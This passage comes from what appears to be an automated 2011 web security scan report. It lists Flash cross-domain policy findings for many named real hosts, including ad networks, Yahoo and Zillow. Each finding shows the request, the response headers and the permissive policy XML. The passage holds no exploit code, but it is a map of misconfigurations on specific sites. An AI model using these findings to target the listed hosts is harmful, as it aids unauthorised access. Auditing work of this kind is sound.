Server: sffe
X-XSS-Protection: 1; mode=block
Age: 45371
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.48. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:24 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.49. http://sensor2.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Feb 2011 18:15:01 GMT
ETag: "1f00e1-c9-49c927e105340"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.50. http://serviceo.comcast.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:41 GMT
Server: Omniture DC/2.0.0
xserver: www380
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.51. http://spe.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Sat, 10 Sep 2011 00:34:44 GMT
Date: Tue, 06 Sep 2011 12:45:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.52. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.53. http://t.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://t.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:49:34 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.55. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:59 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.56. http://utdi.reachlocal.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Last-Modified: Fri, 05 Mar 2010 01:28:54 GMT
ETag: "cc-48103a373c180"
Accept-Ranges: bytes
Content-Length: 204
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Keep-Alive: timeout=12, max=87
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.57. http://utdi.reachlocal.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: utdi.reachlocal.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
Last-Modified: Sat, 09 May 2009 00:14:34 GMT
ETag: "cc-4696fa1390e80"
Accept-Ranges: bytes
Content-Length: 204
Keep-Alive: timeout=12, max=91
Connection: Keep-Alive
Content-Type: application/xml
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.58. http://whitefence.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
xserver: www186
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

3.59. http://www.burstnet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 30 Aug 2011 18:10:17 GMT
ETag: "596a1b-66-4e5d2789"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.60. http://www.myfitv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myfitv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:29:51 GMT
ETag: "90edc-c6-4a32088aa8480"
Last-Modified: Fri, 13 May 2011 04:13:54 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 198
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.61. http://www.zillow.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 12:45:19 GMT
ETag: W/"294-1314817478000"
Last-Modified: Wed, 31 Aug 2011 19:04:38 GMT
Content-Type: text/xml
Content-Length: 294
Via: 1.0 www.zillow.com
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=451
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.62. http://www2.whitefence.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.whitefence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:02:31 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 12:02:31 GMT
Last-Modified: Thu, 25 Sep 2008 22:17:43 GMT
ETag: "c888d-c9-48dc0e07"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.63. http://yql.yahooapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yql.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 12:45:06 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.64. http://a.adready.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.adready.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.adready.com

Response

HTTP/1.0 200 OK
Status: 200 OK
Last-Modified: Thu, 27 Jan 2011 18:42:13 GMT
Content-Type: application/xml
Date: Tue, 06 Sep 2011 12:45:38 GMT
Content-Length: 367
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="*.adready.com" />
<allow-access-from domain="adready.com" />
<allow-access-from domain="*.local" />
...[SNIP]...

3.65. http://ads.bridgetrack.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 541
Content-Type: text/html
Date: Tue, 06 Sep 2011 11:58:42 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.66. http://espanol.vonage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: espanol.vonage.com

Response

HTTP/1.1 200 OK
Content-Length: 538
Content-Type: text/xml
Last-Modified: Tue, 01 Jun 2010 15:31:08 GMT
Accept-Ranges: bytes
ETag: "9bd62f759f1cb1:3746"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:15 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="convertlanguage.com"/>
<allow-access-from domain="*.convertlanguage.com"/>
<allow-access-from domain="espanol.support.vonage.com"/>
...[SNIP]...
<allow-access-from domain="*.vonage.com"/>
...[SNIP]...
<allow-access-from domain="speedtest.vonage.com"/>
...[SNIP]...
<allow-access-from domain="support.vonage.com"/>
...[SNIP]...

3.67. http://finance.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 05 Jun 2008 01:38:47 GMT
Accept-Ranges: bytes
Content-Length: 161
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="us.js2.yimg.com" />
</cross-domain-policy>

3.68. http://frontier.my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: frontier.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.69. http://geo.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.70. http://gws.maps.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gws.maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gws.maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:52 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Yahoo-Serving-Host: gws26.maps.sp1.yahoo.com
Last-Modified: Sat, 05 Dec 2009 08:01:33 GMT
Accept-Ranges: bytes
Content-Length: 469
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.yimg.com" />
   <allow-access-from domain="*.maps.yahoo.com" />
   <allow-access-from domain="*.corp.yahoo.com" />
   <allow-access-from domain="*.ds.corp.yahoo.com" />
   <allow-access-from domain="*.yahoo.com" />
...[SNIP]...

3.71. http://maps.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.72. http://media.sonypictures.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.sonypictures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.sonypictures.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/xml
Age: 204157
Date: Tue, 06 Sep 2011 12:45:10 GMT
Last-Modified: Mon, 09 May 2011 23:28:45 GMT
Content-Length: 965
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.sonypictures.com"/>
<allow-access-from domain="*.avatarlabs.com"/>
<allow-access-from domain="*.client-projects.com"/>
<allow-access-from domain="*.eyewonderlabs.com"/>
<allow-access-from domain="*.eyewonder.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.net"/>
<allow-access-from domain="*.gstatic.com"/>
<allow-access-from domain="*.wovencube.org"/>
<allow-access-from domain="*.wovencube.biz"/>
<allow-access-from domain="*.wovencube.com"/>
...[SNIP]...

3.73. http://mi.adinterax.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Tue, 06 Sep 2011 12:44:47 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Wed, 02 Nov 2011 09:39:00 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

3.74. http://movies.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: movies.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: application/xml
Age: 0
Server: YTS/1.20.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
